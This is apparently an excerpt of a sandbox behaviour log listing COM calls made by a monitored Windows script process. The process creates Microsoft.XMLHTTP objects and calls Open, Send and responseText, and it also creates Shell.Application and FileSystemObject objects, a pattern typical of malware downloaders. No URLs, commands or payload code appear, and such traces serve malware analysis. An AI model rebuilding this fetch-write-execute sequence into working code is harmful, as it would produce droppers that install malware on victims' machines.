	[0438.695] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0438.695] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0438.695] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0438.695] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0438.695] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0438.695] ??2@YAPEAX_K@Z () returned 0x62f330
	[0438.695] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f330) 
	[0438.695] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0438.696] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0438.696] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0438.696] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0438.696] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0438.696] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0438.696] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0438.696] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0438.696] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0438.696] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0438.943] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0438.943] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0438.944] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0438.944] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0438.944] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0438.944] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0438.944] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0438.944] SysStringLen (param_1=0x0) returned 0x0
	[0438.944] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0438.944] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0438.944] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0438.944] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0438.944] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0438.944] ??2@YAPEAX_K@Z () returned 0x62f350
	[0438.945] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0438.945] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0438.945] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0438.945] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0438.945] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0438.945] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0438.945] SysStringLen (param_1=0x0) returned 0x0
	[0438.945] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0438.947] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0438.947] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0438.948] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0438.948] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0438.948] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0438.948] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0439.291] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0439.291] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0439.291] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0439.292] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0439.292] SysStringLen (param_1=0x0) returned 0x0
	[0439.292] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0439.293] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0439.293] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0439.293] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0439.293] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0439.293] ??2@YAPEAX_K@Z () returned 0x62f330
	[0439.293] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
	[0439.293] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0439.293] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0439.293] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0439.293] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0439.293] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0439.293] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0439.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0439.296] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0439.296] SysStringLen (param_1=0x0) returned 0x0
	[0439.296] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0439.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0439.296] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0439.296] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0439.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c28) returned 0x0
	[0439.296] ??2@YAPEAX_K@Z () returned 0x62f310
	[0439.296] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c28, pUnkSite=0x62f310) 
	[0439.296] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0439.296] XMLHTTPRequest:IUnknown:Release (This=0x49c5c28) returned 0x0
	[0439.296] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0439.297] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0439.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0439.297] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0439.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0439.297] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0439.297] SysStringLen (param_1=0x0) returned 0x0
	[0439.297] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0439.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0439.297] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0439.297] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0439.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bc8) returned 0x0
	[0439.297] ??2@YAPEAX_K@Z () returned 0x62f330
	[0439.297] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bc8, pUnkSite=0x62f330) 
	[0439.297] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0439.297] XMLHTTPRequest:IUnknown:Release (This=0x49c5bc8) returned 0x0
	[0439.297] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0439.298] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0439.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0439.298] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0439.298] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0439.298] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0439.298] SysStringLen (param_1=0x0) returned 0x0
